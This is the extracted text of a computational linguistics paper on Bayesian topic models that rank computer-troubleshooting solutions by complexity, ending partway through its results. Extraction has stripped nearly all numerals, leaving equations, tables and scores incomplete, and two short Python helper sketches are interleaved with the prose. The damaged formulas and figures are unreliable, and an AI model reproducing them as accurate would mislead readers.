online discussion forums and community question-answering websites provide one of the primary avenues for online users to share information. in this paper, we propose text mining techniques which aid users navigate troubleshooting-oriented data such as questions asked on forums and their suggested solutions. we introduce bayesian generative models of the troubleshooting data and apply them to two interrelated tasks: (a) predicting the complexity of the solutions (e.g., plugging a keyboard in the computer is easier compared to installing a special driver) and (b) presenting them in a ranked order from least to most complex. experimental results show that our models are on par with human performance on these tasks, while outperforming baselines based on solution length or readability.
introduction online forums and discussion boards have created novel ways for discovering, sharing, and distribut- ing information. users typically post their ques- tions or problems and obtain possible solutions from other users. through this simple mechanism of community-based question answering, it is possible to find answers to personal, open-ended, or highly specialized questions. however, navigating the in- formation available in web-archived data can be challenging given the lack of appropriate search and browsing facilities. table shows examples typical of the problems and proposed solutions found in troubleshooting- oriented online forums. the first problem concerns a shaky monitor and has three solutions with increas- ing degrees of complexity. solution ( ) is probably easiest to implement in terms of user time, effort, and expertise; solution ( ) is most complex (i.e., the user should understand what signal timing is and the screen is shaking. . move all objects that emit a magnetic field, such as a motor or transformer, away from the monitor. . check if the specified voltage is applied. . check if the signal timing of the computer system is within the specification of the monitor. “illegal operation has occurred” error message is displayed. . software being used is not microsoft-certified for your version of windows. verify that the software is certified by microsoft for your version of windows (see program packaging for this information). . configuration files are corrupt. if possible, save all data, close all programs, and restart the computer. table : example problems and solutions taken from on- line troubleshooting oriented forums. then try to establish whether it is within the specifi- cation of the monitor), whereas solution ( ) is some- where in between. in most cases, the solutions are not organized in any particular fashion, neither in terms of content nor complexity. in this paper, we present models to automatically predict the complexity of troubleshooting solutions, which we argue could improve user experience, and potentially help solve the problem faster (e.g., by prioritizing easier solutions). automatically struc- turing solutions according to complexity could also facilitate search through large archives of solutions or serve as a summarization tool. from a linguis- tic perspective, learning how complexity is verbal- ized can be viewed as an instance of grounded lan- guage acquisition. solutions direct users to carry out certain actions (e.g., on their computers or de- vices) and complexity is an attribute of these ac- tions. information access systems incorporating a notion of complexity would allow to take user in- tentions into account and how these translate into natural language. current summarization and infor- mation retrieval methods are agnostic of such types of text semantics. moreover, the models presented here could be used for analyzing collaborative prob- transactions of the association for computational linguistics, vol. , pp. – , . action editor: eric fosler-lussier. submission batch: / ; revision batch / ; published / . c© association for computational linguistics. lem solving and its social networks. characterizing the content of discussion forums by their complexity can provide additional cues for identifying user au- thority and if there is a need for expert intervention. we begin by validating that the task is indeed meaningful and that humans perceive varying de- grees of complexity when reading troubleshooting solutions. 
we also show experimentally that users agree in their intuitions about the relative complex- ity of different solutions to the same problem. we define “complexity” as an aggregate notion of the time, expertise, and money required to implement a solution. we next model the complexity predic- tion task, following a bayesian approach. specifi- cally, we learn to assign complexity levels to solu- tions based on their linguistic makeup. we leverage weak supervision in the form of lists of solutions (to different problems) approximately ordered from low to high complexity (see table ). we assume that the data is generated from a fixed number of dis- crete complexity levels. each level has a probability distribution over the vocabulary and there is a canon- ical ordering between levels indicating their relative complexity. during inference, we recover the vo- cabularies of the complexity levels and the ordering of levels that explains the solutions and their attested sequences in the training data. we explore two bayesian models differing in how they learn an ordering among complexity levels. the first model is local, it assigns an expected position (in any list of solutions) to each complexity level and orders the levels based on this expected posi- tion value. the second model is global, it defines probabilities over permutations of complexity lev- els and directly uncovers a consensus ordering from the training data. we evaluate our models on a so- lution ordering task, where the goal is to rank so- lutions from least to most complex. we show that a supervised ranking approach using features based on the predictions of our generative models is on par with human performance on this task while outper- forming competitive baselines based on length and readability of the solution text. related work there is a long tradition of research on decision- theoretic troubleshooting where the aim is to find a cost efficient repair strategy for a malfunction- ing device (heckerman et al., ). typically, a diagnostic procedure (i.e., a planner) is developed that determines the next best troubleshooting step by estimating the expected cost of repair for various plans. costs are specified by domain experts and are usually defined in terms of time and/or money in- curred by carrying out a particular repair action. our notion of complexity is conceptually similar to the cost of an action, however we learn to predict com- plexity levels rather than calibrate them manually. also note that our troubleshooting task is not device specific. our models learn from troubleshooting- oriented data without any restrictions on the prob- lems being solved. previous work on web-based user support has mostly focused on thread analysis. the idea is to model the content structure of forum threads by an- alyzing the requests for information and suggested solutions in the thread data (wang et al., ; kim et al., ). examples of such analysis include identifying which earlier post(s) a given post re- sponds to and in what manner (e.g., is it a question, an answer or a confirmation). other related work (lui and baldwin, ) identifies user characteris- tics in such data, i.e., whether users express them- selves clearly, whether they are technically knowl- edgeable, and so on. although our work does not address threaded discourse, we analyze the content of troubleshooting data and show that it is possible to predict the complexity levels for suggested solu- tions from surface lexical cues. 
our work bears some relation to language ground- ing, the problem of extracting representations of the meaning of natural language tied to the physical world. mapping instructions to executable actions is an instance of language grounding with applica- tions to automated troubleshooting (branavan et al., ; eisenstein et al., ), navigation (vogel and jurafsky, ), and game-playing (branavan et al., ). in our work, there is no direct attempt to model the environment or the troubleshooting steps. rather, we study the language of instructions and how it correlates with the complexity of the implied actions. our results show that it possible to predict complexity, while being agnostic about the seman- tics of the domain or the effect of the instructions in the corresponding environment. our generative models are trained on existing archives of problems with corresponding solutions (approximately ordered from least to most complex) and learn to predict an ordering for new sets of so- lutions. this setup is related to previous studies on information ordering where the aim is to learn statistical patterns of document structure which can be then used to order new sentences or paragraphs in a coherent manner. some approaches approxi- mate the structure of a document via topic and entity sequences using local dependencies such as condi- tional probabilities (lapata, ; barzilay and la- pata, ) or hidden markov models (barzilay and lee, ). more recently, global approaches which directly model the permutations of topics in the doc- ument have been proposed (chen et al., b). fol- lowing this line of work, one of our models uses the generalized mallows model (fligner and ver- ducci, ) in its generative process which allows to model permutations of complexity levels in the training data. problem formulation our aim in this work is to learn models which can automatically reorder solutions to a problem from low to high complexity. let g = (c , c , .. cn ) be a collection of solutions to a specific problem. we wish to output a list g′ = (c′ , c ′ , .. c ′ n ), such that d(c′j) ≤d(c′j+ ), where d(x) refers to the com- plexity of solution x. . corpus collection as training data we are given problem-solution sets similar to the examples in table where the solu- tions are approximately ordered from low to high complexity. a solution set si is specific to prob- lem pi, and contains an ordered list of npi solu- tions si = (x , x , . . . , xnpi ) such that d(xj) < d(xj+ ). we refer to the number of solutions re- lated to a problem, npi , as its solution set size. for our experiments, we collected problems and their solutions from multiple web sites includ- ing the computing support pages of microsoft, ap- ple, hp, as well as amateur computer help websites such as www.computerhope.com. the prob- lems were mostly frequently asked questions (faqs) referring to malfunctioning personal computers and smart phones. the solutions were provided by com- puter experts or experienced users in the absence the corpus can be downloaded from http: //www.homepages.inf.ed.ac.uk/alouis/ solutioncomplexity.html. solution set size f re qu en cy figure : histogram of solution set sizes of any interaction with other users or their devices and thus constitute a generic list of steps to try out. we assume that in such a situation, the solution providers are likely to suggest simpler solutions be- fore other complex ones, leading to the solution lists being approximately ordered from low to high com- plexity. 
in the next section, we verify this assump- tion experimentally. in this dataset, the solution set size varies between and and the average number is . . figure illustrates the histogram of solution set sizes found in our corpus. we only considered problems which have no less than two solutions. all words in the corpus were lemmatized and html links and numbers were replaced with placeholders. the resulting vocabulary was approximately , word types ( , tokens). note that our dataset provides only weak super- vision for learning. the relative complexity of so- lutions for the same problem is observed, however, the relative complexity of solutions across different problems is unknown. for example, a hardware is- sue may generally receive highly complex solutions whereas a microphone issue mostly simple ones. . task validation in this section, we detail an annotation experiment where we asked human judges to rank the randomly permuted contents of a solution set according to per- ceived complexity. we performed this study for two reasons. firstly, to ascertain that participants are able to distinguish degrees of complexity and agree on the complexity level of a solution. secondly, to examine whether the ordering produced by partici- pants corresponds to the (gold-standard) faq order of the solutions. if true, this would support our hy- www.computerhope.com http://www.homepages.inf.ed.ac.uk/alouis/solutioncomplexity.html http://www.homepages.inf.ed.ac.uk/alouis/solutioncomplexity.html http://www.homepages.inf.ed.ac.uk/alouis/solutioncomplexity.html b c d faq a . . . . b . . . c . . d . table : correlation matrix for annotators (a–d) and original faq order using kendall’s τ (values are aver- ages over problem-solution sets). pothesis that the solutions in our faq corpus are fre- quently presented according to complexity and that this ordering is reasonable supervision for our mod- els. method we randomly sampled solution sets (their sizes vary between and ) from the faq corpus described in the previous section and randomly permuted the contents of each set. four annotators, one an author of this paper, and three graduate and undergraduate students in computer science were asked to order the solutions in each set from easy to most complex. an easier solution was defined as one “which takes less time or effort to carry out by a user”. the annotators saw a list of solutions for the same problem on a web interface and assigned a rank to each solution to create an or- der. no ties were allowed and a complete ordering was required to keep the annotation simple. the an- notators were fluent english speakers and had some knowledge of computer hardware and software. we refrained from including novice users in our study as they are likely to have very different personal pref- erences resulting in more divergent rankings. results we measured inter-annotator agreement using kendall’s τ, a metric of rank correlation which has been reliably used in information ordering eval- uations (lapata, ; bollegala et al., ; mad- nani et al., ). τ ranges between − and + , where + indicates equivalent rankings, − com- pletely reverse rankings, and independent rank- ings. table shows the pairwise inter-annotator agreement as well as the agreement between each annotator and the original faq order. the table shows fair agreement between the annotators con- firming that this is a reasonable task for humans to do. as can be seen, there are some individual dif- ferences, with the inter-annotator agreement varying from . 
(for a,b) to . (for a,d). the last column in table reports the agreement between our annotator rankings and the original or- dering of solutions in the faq data. although there is fair agreement with the faq providing support for its use as a gold-standard, the overall τ values are lower compared to inter-annotator agreement. this implies that the ordering may not be strictly increas- ing in complexity in our dataset and that our models should allow for some flexibility during learning. several reasons contributed to disagreements be- tween annotators and with the faq ordering, such as the users’ expertise, personal preferences, or the nature of the solutions. for instance, annotators dis- agreed when multiple solutions were of similar com- plexity. for the first example in table , all anno- tators agreed perfectly and also matched the faq order. for the second example, the annotators dis- agreed with each other and the faq. generative models in the following we introduce two bayesian topic models for the complexity prediction (and rank- ing) task. in these models, complexity is captured through a discrete set d of l levels and a total or- dering between the levels reflects their relative com- plexity. in other words, d = (d ,d , ...dl), where d is easiest level and d(dm) < d(dm+ ) . each complexity level is parametrized by a unigram lan- guage model which captures words likely to occur in solutions with that level. our two models are broadly similar. their gen- erative process assigns a complexity level from d to each solution such that it explains the words in the solution and also the ordering of solu- tions within each solution set. words are gener- ated for each solution by mixing problem-specific words with solution-specific (and hence complexity- related) ones. also, each problem has its own distri- bution over complexity levels which allows for some problems to have more complex solutions on aver- age, some a mix of high and low complexity solu- tions, or otherwise predominantly easier solutions. the main difference between the two models is in the way they capture the ordering between levels. our first model infers a distribution for each level over the positions at which a solution with that com- plexity can occur and uses this distribution to order the levels. levels which on average occur at greater positions have higher complexity. the second model defines probabilities over orderings of levels in the corpus level for each complexity level dm, ≤ m ≤ l, - draw a complexity vocabulary distribution φm ∼ dirichlet(α) - draw a distribution over positions γm ∼ dirichlet(ρ) - draw a distribution ψ for the proportion of complexity- versus problem-specific vocabulary ∼ beta(δ , δ ) solution set level for each solution set qi in the corpus, ≤ i ≤ n, - draw a distribution over the complexity levels θi ∼ dirichlet(β) - draw a problem-specific vocabulary distribution λi ∼ dirichlet(ω) individual solution level for each solution xij in qi, ≤ j ≤ npi , - draw a complexity level assignment, zij ∼ multinomial(θi) - draw a position depending on the level assigned, rij ∼ multinomial(γzij ) word level for each word wijk in solution xij , - draw a switch value to indicate if the word is problem- or complexity-specific, sijk ∼ binomial(ψ) - if sijk = , draw wijk ∼ multinomial(φzij ) - if sijk = , draw wijk ∼ multinomial(λi) figure : generative process for the position model generative process itself. 
the inference process of this model allows to directly uncover a canonical or- dering of the levels which explains the training data. . expected position model this model infers the vocabulary associated with a complexity level and a distribution over the numer- ical positions in a solution set where such a com- plexity level is likely to occur. after inference, the model uses the position distribution to compute the expected position of each complexity level. the lev- els are ordered from low to high expected position and taken as the order of increasing complexity. the generative process for our model is described in figure . a first phase generates the latent vari- ables which are drawn once for the entire corpus. then, variables are drawn for a solution set, next for each solution in the set, and finally for the words in the solutions. the number of complexity levels l is a parameter in the model, while the vocabulary size v is fixed. for each complexity level dm, we draw one multinomial distribution φ over the vocab- ulary v , and another multinomial γ over the pos- sible positions. these two distributions are drawn from symmetric dirichlet priors with hyperparame- ters α and ρ. solutions will not only contain words relating to their complexity but also to the prob- lem or malfunctioning component at hand. we as- sume these words play a minor role in determining complexity and thus draw a binomial distribution ψ that balances the amount of problem-specific ver- sus complexity-specific vocabulary. this distribu- tion has a beta prior with hyperparameters δ and δ . for each solution set, we draw a distribution over the complexity levels θ from another dirichlet prior with concentration β. this distribution allows each problem to take a different preference and mix of complexity levels for its solutions. another multino- mial λ over the vocabulary is drawn for the problem- specific content of each solution set. λ is given a symmetric dirichlet prior with concentration ω. for each individual solution in a set, we draw a complexity level z from θ, i.e., the complexity level proportions for that problem. a position for the so- lution is then drawn from the position distribution for that level, i.e., γz. the words in the solution are generated by first drawing a switch value for each word indicating if the word came from the problem’s technical or complexity vocabulary. accordingly, the word is drawn from λ or φz. during inference, we are interested in the poste- rior of the model given the faq training data. based on the conditional independencies of the model, the posterior is proportional to: p(ψ|δ ,δ )× l∏ m= [p(φm|α)]× l∏ m= [p(γm|ρ)] × n∏ i= [p(θi|β)]× n∏ i= [p(λi|ω)] × n∏ i= npi∏ j= [p(zij|θi)p(rij|γzij )] × n∏ i= npi∏ j= |xij|∏ k= [p(sijk|ψ)p(wijk|sijk,φzij,λi)] where l is the number of complexity levels, n the number of problems in the training corpus, npi the size of solution set for problem pi, and |xij| the number of words in solution xij. the use of conjugate priors for the multinomial and binomial distributions allows us to integrate out the ψ, φ, γ, λ and θ distributions. the simplified posterior is proportional to: n∏ i= l∏ m= Γ(rmi +βm) Γ ( l∑ m= rmi +βm ) × l∏ m= g∏ r= Γ(qrm+ρr) Γ ( g∑ r= qrm+ρr ) × ∏ u= Γ(tu+δu) Γ ( ∑ u= tu+δu ) × l∏ m= v∏ v= Γ(t m(v)+αv) Γ ( v∑ v= t m(v)+αv ) × n∏ i= v∏ v= Γ(t i (v)+ωv) Γ ( v∑ v= t i (v)+ωv ) where rmi is the number of times level m is as- signed to a solution in problem i. 
qrm is the num- ber of times a solution with position r is given com- plexity m over the full corpus. positions are integer values between and g. t and t count the num- ber of switch assignments of value (complexity- related word) and (technical word) respectively in the corpus. t m(v) is a refined count of the number of times word type v is assigned switch value in a solution of complexity m. t i (v) counts the number of times switch value is given to word type v in a solution set for problem i. we sample from this posterior using a collapsed gibbs sampling algorithm. the sampling sequence starts with a random initialization to the hidden vari- ables. during each iteration, the sampler chooses a complexity level for each solution based on the current assignments to all other variables. then the switch values for the words in each solution are sam- pled one by one. the hyperparameters are tuned us- ing grid search on development data. the language model concentrations α, ρ and ω are given values less than to obtain sparse distributions. the prior on θ, the topic proportions, is chosen to be greater than to encourage different complexity levels to be used within the same problem rather than assigning all solutions to the same one or two levels. similarly, δ and δ are > . we run , sampling iterations and use the last sample as a draw from the posterior. using these assignments, we also compute an esti- mate for the parameters φm, λi and γm. for exam- ple, the probability of a word v in φm is computed as t m(v)+αv∑ v(t m(v)+αv) . after inference, we obtain probability distribu- tions for each complexity level dm over the vocabu- lary φm and positions γm. we compute the expected position ep of dm as: ep(dm) = g∑ pos= pos ∗γm(pos) ( ) where pos indicates position values. then, we rank the levels in increasing order of ep. . permutations-based model in our second model we incorporate the ordering of complexity levels in the generative process itself. this is achieved by using the generalized mallows model (gmm; fligner and verducci ( )) within our hierarchical generative process. the gmm is a probabilistic model over permutations of items and is frequently used to learn a consensus ordering given a set of different rankings. it assumes there is an underlying canonical order of items and concen- trates probability mass on those permutations that differ from the canonical order by a small amount, while assigning lesser probability to very divergent permutations. probabilistic inference in this model uncovers the canonical ordering. the standard mallows model (mallows, ) has two parameters, a canonical ordering σ and a dispersion penalty ρ > . the probability of an ob- served ordering π is defined as: p(π|ρ,σ) = e −ρd(π,σ) ξ(ρ) , where d(π,σ) is a distance measure such as kendall’s τ, between the canonical ordering σ and an observed ordering π. the gmm decomposes d(π,σ) in a way that captures item-specific dis- tance. this is done by computing an inversion vec- tor representation of d(π,σ). a permutation π of n items can be equivalently represented by a vector of inversion counts v of length n− , where each com- ponent vi equals the number of items j > i that oc- cur before item i in π. the dimension of v is n− since there can be no items greater than the high- est value element. a unique inversion vector can be computed for any permutation and vice versa, and the sum of the inversion vector elements is equal to d(π,σ). each vi is also given a separate disper- sion penalty ρi. 
then, the gmm is defined as: gmm(v|ρ) ∝ ∏ i e−ρivi ( ) corpus level for each complexity level dm, ≤ m ≤ l, - draw a complexity vocabulary distribution φm ∼ dirichlet(α) - draw the l − dispersion parameters ρr ∼ gmm (µ ,v r) - draw a distribution ψ for the proportion of complexity- versus problem-specific vocabulary ∼ beta(δ , δ ) solution set level for each solution set qi in the corpus, ≤ i ≤ n, - draw a distribution over the complexity levels θi ∼ dirichlet(β) - draw a problem-specific vocabulary distribution λi ∼ dirichlet(ω) - draw a bag of npi levels for the solution set bi ∼ multinomial(θi) - draw an inversion vector vi vi ∼ gmm(ρ) - compute permutation πi of levels using vi - compute level assignments zi using πi and bi. assign level zij to xij for ≤ j ≤ npi . word level for each word wijk in solution xij , - draw a switch value to indicate if the word is problem- or complexity-specific, sijk ∼ binomial(ψ) - if sijk = , draw wijk ∼ multinomial(φzij ) - if sijk = , draw wijk ∼ multinomial(λi) figure : generative process for permutation model. and can be further factorized into item-specific components: gmmi(vi|ρi) ∝ e−ρivi ( ) since the gmm is a member of the exponential fam- ily, a conjugate prior can be defined for each disper- sion parameter ρi which allows for efficient infer- ence. we refer the interested reader to chen et al. ( a) for details on the prior distribution and nor- malization factor for the gmm distribution. figure formalizes the generative story of our own model which uses the gmm as a component. we assume the canonical order is the strictly increas- ing ( , , ..,l) order. for each complexity level dm, we draw a distribution φ over the vocabulary. we also draw l− dispersion parameters from the con- jugate prior gmm density. hyperparameters for this prior are set in a similar fashion to chen et al. ( a). as in the position model, we draw a binomial distribution, ψ (with a beta prior) over complexity- versus problem-specific vocabulary. at the solution set level, we draw a multinomial dis- tribution λ over the vocabulary and a multinomial distribution θ for the proportion of l levels for this problem. both these distributions have dirichlet pri- ors. next, we generate an ordering for the complex- ity levels. we draw npi complexity levels from θ, one for each solution in the set. let b denote this bag of levels (e.g., b = ( , , , , , , ) assuming complexity levels and solutions for a particular problem). we also draw an inversion vector v from the gmm distribution which advantageously allows for small differences from the canonical order. the z assignments are deterministically computed by or- dering the elements of b according to the permuta- tion defined by v. given the conditional independencies of our model, the posterior is proportional to: l∏ m= [p(φm|α)]× l− ∏ r= [p(ρr|µ ,v r)]×p(ψ|δ ,δ ) × n∏ i= [p(θi|β)×p(λi|ω)×p(vi|ρ)×p(bi|θi)] × n∏ i= npi∏ j= |xij|∏ k= [p(sijk|ψ)p(wijk|sijk,φzij,λi)] where l is the number of complexity levels, n the total problems in the training corpus, npi the size of solution set for problem pi, and |xij| the number of words in solution xij. 
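the inversion-vector representation used by the gmm can be made concrete with a short sketch. the helpers below (illustrative names, not taken from the paper's implementation) rebuild a permutation of the levels from its inversion counts and then order a bag of drawn levels accordingly, which is the deterministic step that produces the z assignments.

```python
def permutation_from_inversions(v, n):
    """rebuild a permutation of items 1..n from inversion counts:
    v[i-1] is the number of items larger than i placed before i."""
    perm = [n]                        # the largest item has no inversion count
    for item in range(n - 1, 0, -1):  # insert remaining items in decreasing order
        perm.insert(v[item - 1], item)
    return perm

def assign_levels(bag, v, n_levels):
    """order a bag of drawn complexity levels by the permutation encoded in v."""
    order = permutation_from_inversions(v, n_levels)
    rank = {level: pos for pos, level in enumerate(order)}
    return sorted(bag, key=lambda level: rank[level])

# e.g. with 3 levels, v = [2, 0] encodes the order (2, 3, 1), so
# assign_levels([1, 1, 2, 3], [2, 0], 3) returns [2, 3, 1, 1]
```

because the gmm concentrates probability mass on small inversion counts, the recovered orderings stay close to the canonical increasing order of complexity levels while still allowing problem-specific deviations.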
a simplified posterior can be obtained by integrating out the ψ, φ, λ, and θ distributions which is proportional to: n∏ i= l∏ m= Γ(rmi +βm) Γ ( l∑ m= rmi +βm ) × l− ∏ r= gmm (ρr|µ ,v r) × n∏ i= l− ∏ r= gmmr(vir|ρr)× ∏ u= Γ(tu+δu) Γ ( ∑ u= tu+δu ) × l∏ m= v∏ v= Γ(t m(v)+αv) Γ ( v∑ v= t m(v)+αv ) × n∏ i= v∏ v= Γ(t i (v)+ωv) Γ ( v∑ v= t i (v)+ωv ) where the r and t counts are defined similarly as in the expected position model. we use collapsed gibbs sampling to compute samples from this posterior. the sampling sequence level free, space, hard, drive, sure, range, make, least, more, op- erate, than, point, less, cause, slowly, access, may, problem level use, can, media, try, center, signal, network, make, file, sure, when, case, with, change, this, setting, type, remove level system, file, this, restore, do, can, then, use, hard, issue, num, will, disk, start, step, above, run, cleanup, drive, xp level registry, restore, may, virus, use, bio, setting, scanreg, first, ensure, can, page, about, find, install, additional, we, utility table : most likely words assigned to varying complex- ity levels by the permutations-based model. randomly initializes the hidden variables. for a cho- sen solution set si, the sampler draws npi levels (bi), one at a time conditioned on the assignments to all other hidden variables of the model. then the inversion vector vi is created by sampling each vij in turn. at this point, the complexity level as- signments zi can be done deterministically given bi and vi. then the words in each solution set are sampled one at a time. for the dispersion parame- ters, ρ, the normalization constant of the conjugate prior is not known. we sample from the unnormal- ized gmm distribution using slice sampling. other hyperparameters of the model are tuned us- ing development data. the language model dirichlet concentrations (α, ω) are chosen to encourage spar- sity and β > as in the position model. we run the gibbs sampler for , iterations; the disper- sion parameters are resampled every iterations. the last sample is used as a draw from the posterior. . model output in this section we present examples of the complex- ity assignments created by our models. table shows the output of the permutations-based model with levels. each row contains the highest prob- ability words in a single level (from the distribu- tion φm). for the sake of brevity, we only show the two least and most complex levels. in general, we observe more specialized, technical terms in higher levels (e.g., restore, scanreg, registry) which one would expect to correlate with complex solutions. also note that higher levels contain uncertainty de- noting words (e.g., can, find, may) which again are indicative of increasing complexity. using these complexity vocabularies, our models low complexity . cable(s) of new external device are loose or power ca- bles are unplugged. ensure that all cables are properly and securely connected and that pins in the cable or connector are not bent down. . make sure your computer has at least mb of free hard drive space. if your computer has less than mb free, it may cause the computer to operate more slowly. . if the iphone is in a protective case, remove it from the case. if there is a protective film on the display, remove the film. medium complexity . choose a lower video setting for your imported video. . the file property is set to read-only. to work around this issue, remove the read-only property. 
for more information about file properties, see view the prop- erties for a file. . the system is trying to start from a media device that is not bootable. remove the media device from the drive. high complexity . if you are getting stopped at the cd-key or serial number verification, verify you are entering your cor- rect number. if you lost your number or key or it does not work, you will need to contact the developer of the program. computer hope will not provide any users with an alternate identification number. . the network controller is defective. contact an autho- rized service provider. . network controller interrupt is shared with an expan- sion board. under the computer setup advanced menu, change the resource settings for the board. table : example solutions with low, medium and high expected complexity values (position-based model with complexity levels). the solutions come from various problem-solution sets in the training corpus. expected complexity values are shown in the first column. can compute the expected complexity for any so- lution text, x. this value is given by [ ∑l m= m ∗ p(m|x)]. we estimate the second term, p(m|x), using a) the complexity level language models φm and b) a prior over levels given by the overall fre- quency of different levels on the training data. ta- ble presents examples of solution texts from our training data and their expected complexity under the position-model. we find that the model is able to distinguish intuitively complex solutions from sim- pler ones. aside from measuring expected complex- ity in absolute terms, our models can also also or- der solutions in terms of relative complexity (see the evaluation in section ) and assign a complex- ity value to a problem as a whole. low complexity problems - computer appears locked up and will not turn off when the power button is pressed. - a usb device, headphone, or microphone is not recognized by the computer. - computer will not respond to usb keyboard or mouse. high complexity problems - game software and driver issues. - incorrect, missing or stale visible networks. - i get an error message that says that there is not enough disk space to publish the movie. what can i do? - power led flashes red four times, once every second, fol- lowed by two second pause, and computer beeps four times. table : least and most complex problems based on the expected complexity of their solution set. problems are shown with complexity – (top) and – (bottom) using the position-based model. as mentioned earlier, our models only observe the relative ordering of solutions to individual problems; the relative complexity of two solutions from differ- ent problems is not known. nevertheless, the models are able to rate solutions on a global scale while ac- commodating problem-specific ordering sequences. specifically, we can compute the expected complex- ity of the solution set for problem i, using the in- ferred distribution over levels θi: ∑l m= m × θim. table shows the complexity of different problems as predicted by the position model (with levels). as can be seen, easy problems are associated with accessory components (e.g., mouse or keyboard), whereas complex problems are related to core hard- ware and operating system errors. evaluation experiments in the previous section, we showed how our mod- els can assign an expected complexity value to a so- lution text or an entire problem. now, we present evaluations based on model ability to order solutions according to relative complexity. . 
solution ordering task we evaluated our models by presenting them with a randomly permuted set of solutions to a problem and examining the accuracy with which they reorder them from least to most complex. at first instance, it would be relatively straightforward to search for the sequence of solutions which has high likelihood under the models. unfortunately, there are two prob- lems with this approach. firstly, the likelihood un- der our models is intractable to compute, so we would need to adopt a simpler and less precise ap- proximation (such as the hidden markov model dis- cussed below). secondly, when the solution set size is large, we cannot enumerate all permutations and need to adopt an approximate search procedure. we opted for a discriminative ranking approach instead which uses the generative models to compute a rich set of features. this choice allows us to simul- taneously obtain features tapping on to different as- pects learned by the models and to use well-defined objective functions. below, we briefly describe the features based on our generative models. we also present additional features used to create baselines for system comparison. likelihood we created a hidden markov model based on the sample from the posterior of our mod- els (for a similar hmm approximation of a bayesian model see elsner et al. ( )). for our model, the hmm has l states, and each state sm corresponds to a complexity level dm. we used the complex- ity language models φm estimated from the poste- rior as the emission probability distribution for the corresponding states. the transition probabilities of the hmm were computed based on the complexity level assignments for the training solution sequences in our posterior sample. the probability of transi- tioning to state sj from state si, p(sj|si), is the con- ditional probability p(dj|di) computed as c(di,dj )c(di) , where c(di,dj) is the number of times the complex- ity level dj is assigned to a solution immediately fol- lowing a solution which was given complexity di. c(di) is the number of times complexity level di is assigned overall in the training corpus. we perform laplace smoothing to avoid zero probability transi- tions between states: p(sj|si) = c(di,dj) + c(di) + l ( ) this hmm formulation allows us to use efficient dy- namic programming to compute the likelihood of a sequence of solutions. given a solution set, we compute an ordering as follows. we enumerate all orderings for sets with size less than , and select the sequence with the highest likelihood. for larger sizes, we use a sim- ulated annealing search procedure which swaps two adjacent solutions in each step. the temperature was set to initially and gradually reduced to . these values were set using minimal tuning on the devel- opment data. after estimating the most likely se- quence for a solution set, we used the predicted rank of each solution as a feature in our discriminative model. expected complexity as mentioned earlier, we computed the expected complexity of a solution x as [ ∑l m= m∗p(m|x)], where the second term was estimated using a complexity level specific language model φm and a uniform prior over levels on the test set. as additional features, we used the solu- tion’s perplexity under each φm, and under each of the technical topics λi, and also the most likely level for the text arg maxm p(m|x). finally, we included features for each word in the training data. 
the fea- ture value is the word’s expected level multiplied by the probability of the word in the solution text. length we also investigated whether solution length is a predictor of complexity (e.g., simple so- lutions may vary in length and amount of detail from complex ones). we devised three features based on the number of sentences (within a solution), words, and average sentence length. syntax/semantics another related class of fea- tures estimates solution complexity based on sen- tence structure and meaning. we obtained eight syntactic features based on the number of nouns, verbs, adjectives and adverbs, prepositions, pro- nouns, wh-adverbs, modals, and punctuation. other features compute the average and maximum depth of constituent parse trees. the part-of-speech tags and parse trees were obtained using the stanford corenlp toolkit (manning et al., ). in addi- tion, we computed semantic features using word- net (miller, ). they are the average num- ber of senses for each category (noun, verb, adjec- tive/adverb), and the maximum number of senses for the same three classes. we also include the aver- age and maximum lengths of the path to the root of the hypernym tree for nouns and verbs. this class of features roughly approximates the indicators typ- ically used in predicting text readability (schwarm and ostendorf, ; mcnamara et al., ). . experimental setup we performed -fold cross-validation. we trained the ranking model on problem-solution sets; sets were reserved for development and for testing (in each fold). the most frequent words in each training set were filtered as stopwords. the de- velopment data was used to tune the parameters and hyperparameters of the models and the number of complexity levels. we experimented with ranges [ – ] and found that the best number of levels was for the position model and for the permutation- based model, respectively. for the expected posi- tion model, positions were normalized before train- ing. let solution xir denote the rth solution in the solution set for problem pi, where ≤ r ≤ npi . we normalize r to a value between and using a min-max method: r′ = r− npi− . then the [ – ] range is divided into k bins. the identity of the bin containing r′ is taken as the normalized position, r. we tuned k experimentally during development and found that k = performed best. for our ordering experiments we used joachims’ ( ) svmrank package for training and testing. during training, the classifier learns to minimize the number of swapped pairs of solutions over the train- ing data. we used a linear kernel and the regulariza- tion parameter was tuned using grid search on the development data of each fold. we evaluate how well the model’s output agrees with gold-standard ordering using kendall’s τ. . results table summarizes our results (average kendall’s τ across folds). we present the results of the dis- criminative ranker when using a single feature class based on likelihood and expected complexity (posi- tion, permutation), length, and syntactico-semantic features (synsem), and their combinations (denoted via +). we also report the performance of a base- line which computes a random permutation for each solution set (random; results are averaged over five runs). we show results for all solution sets (all) and broken down into different set sizes (e.g., – , – ). as can be seen, the expected position model ob- tains an overall τ of . and the permutation model of . . 
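for reference, the agreement statistic used throughout this evaluation can be computed as follows. this is a minimal sketch of kendall's τ in its simple τ-a form (no tie correction); whether the reported numbers use this exact variant is not stated here, so treat it as illustrative.

```python
from itertools import combinations

def kendall_tau(gold_rank, pred_rank):
    """Kendall's tau between two rankings of the same solution set.

    gold_rank, pred_rank: dicts mapping a solution id -> its position
    (1 = least complex). Returns a value in [-1, 1]; 1 means the orderings
    are identical, -1 means one is the exact reverse of the other.
    """
    items = list(gold_rank)
    concordant = discordant = 0
    for a, b in combinations(items, 2):
        g = gold_rank[a] - gold_rank[b]
        p = pred_rank[a] - pred_rank[b]
        if g * p > 0:
            concordant += 1
        elif g * p < 0:
            discordant += 1
    n_pairs = len(items) * (len(items) - 1) / 2
    return (concordant - discordant) / n_pairs

# a four-solution set reordered with one adjacent swap
gold = {"s1": 1, "s2": 2, "s3": 3, "s4": 4}
pred = {"s1": 1, "s2": 3, "s3": 2, "s4": 4}
print(kendall_tau(gold, pred))  # 0.666...
```

the correlations reported above for the position and permutation models are averages of this statistic across the cross-validation folds.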
